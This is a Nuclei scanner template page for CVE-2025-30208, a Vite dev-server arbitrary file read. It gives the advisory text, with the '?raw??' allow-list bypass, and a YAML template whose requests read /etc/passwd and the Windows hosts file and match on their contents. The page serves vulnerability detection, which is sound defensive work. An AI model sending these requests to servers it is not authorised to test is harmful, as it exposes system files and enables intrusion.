Skip to content
Nuclei Templates

Vite - Arbitrary File Read

ID: CVE-2025-30208

Severity: medium

Author: v2htw

Tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208

Description

Section titled “Description”

Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. @fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.

YAML Source

Section titled “YAML Source”
id: CVE-2025-30208


info:
  name: Vite - Arbitrary File Read
  author: v2htw
  severity: medium
  description: |
    Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-30208
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'body="/@vite/client"'
  tags: cve,cve2025,arbitrary-file-read,vite,CVE-2025-30208


flow: http(1) && http(2)


http:
  - method: GET
    path:
      - "{{BaseURL}}"


    matchers:
      - type: word
        part: body
        words:
          - "vite"
        internal: true


  - method: GET
    path:
      - "{{BaseURL}}/etc/passwd?raw"
      - "{{BaseURL}}/C:/Windows/System32/drivers/etc/hosts?raw"


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "Microsoft Corp"
        condition: or


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b9f1be4fe223712c9e597c0609d96008779c63810723b5ee0a1216254f406d800221009f1ce6616f79bcbd9ee9f286a6d6696f6dcc9c493f01155de9fa89658a04533f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-30208.yaml"

View on Github